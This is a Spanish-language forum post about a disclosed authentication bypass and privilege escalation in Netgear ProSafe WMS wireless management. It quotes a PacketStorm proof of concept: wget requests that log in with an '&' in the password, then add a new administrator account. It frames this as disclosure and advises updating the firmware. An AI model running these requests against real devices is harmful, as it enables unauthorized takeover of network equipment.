El libre pensamiento para un internet libre
No estas registrado.
El "pro safe" es un switch de Netgear para redes profesionales.
Con este dispositivo se puede crear una red de hasta 16 puntos de accesos que controlamos gracias a la interfaz en java proporcionada por Netgear
Elliot LEWIS explica hoy como saltarse los credenciales para entrar en la interfaz de gestión de la red.
Y luego nos explica como obtener los privilegios de administrador para hacer modificaciones en la configuración.
Elliot ha descubierto la brecha en mayo y ha trabajado conjuntamente con Netgear.
Así que la vulnerabilidad esta corregida a partir del firmware que ha sacado en junio el fabricante.
Para los numerosos empresarios miembros de wifi-libre - y dios sabe que son muchos - es muy importante hacer un update de su "ProSafe"
Para los demás interesemos-nos a los mecanismos descritos en el full disclosure :
NETGEAR WMS Authentication Bypass / Privilege Escalation @ PacketStorm
[-] Proof of Concept:
=================
wget --keep-session-cookies --save-cookies=cookies.txt
--post-data="reqMethod=auth_user&jsonData=%7B%22user_name%22%3A%20%22ANYTHING%22%2C%20%22password%22%3A%20%22&%22%7D"
http://192.168.1.2/login_handler.php && wget
--load-cookies=cookies.txt
En el ejemplo usamos wget para forzar la entrada y crear una sesión gracias a un coockie.
Para lograr que no seamos rechazados debemos incluir el símbolo & en la contraseña que mandamos en nuestros datas POST para autenticarse.
Podéis ver en el ejemplo que nos da el POC que se pone un simple & aqui
password%22%3A%20%22&%22%7D
Pasado un momento la GUI va a aceptarnos y podremos visitar la GUI con ellos.
--post-data="reqMethod=add_user&jsonData=%7B%22user_name%22%3A%20%22newusername%22%2C%20%22password%22%3A%20%22newpassword%22%2C%20%22re_password%22%3A%20%22newpassword%22%2C%20%22type%22%3A%20%222%22%7D"
http://192.168.1.2/request_handler.php
La idea aquí es simplemente de añadir con datas POST otra cuenta root.
Una vez hecho la usaremos para tomar el control de la red.
No será necesario esta vez usar el símbolo &
¡Hasta la próxima!
Desconectado
Tema | Respuestas | Vistas | Ultimo mensaje |
---|---|---|---|
3 | 223 | Hoy 11:15:28 por kcdtv | |
14 | 2426 | 29-06-2022 13:19:48 por kcdtv | |
Error de inicio en entorno gráfico por Hunter310#
|
24 | 15154 | 20-06-2022 12:22:19 por kcdtv |
15 | 2751 | 10-06-2022 09:13:42 por kcdtv | |
0 | 258 | 02-06-2022 10:05:09 por kcdtv |
Ultimo usuario registrado: Mr-robot-Frankie
Usuarios registrados conectados: 0
Invitados conectados: 11
Número total de usuarios registrados: 2,320
Número total de temas: 1,588
Número total de mensajes: 15,147
Atom tema feed - Impulsado por FluxBB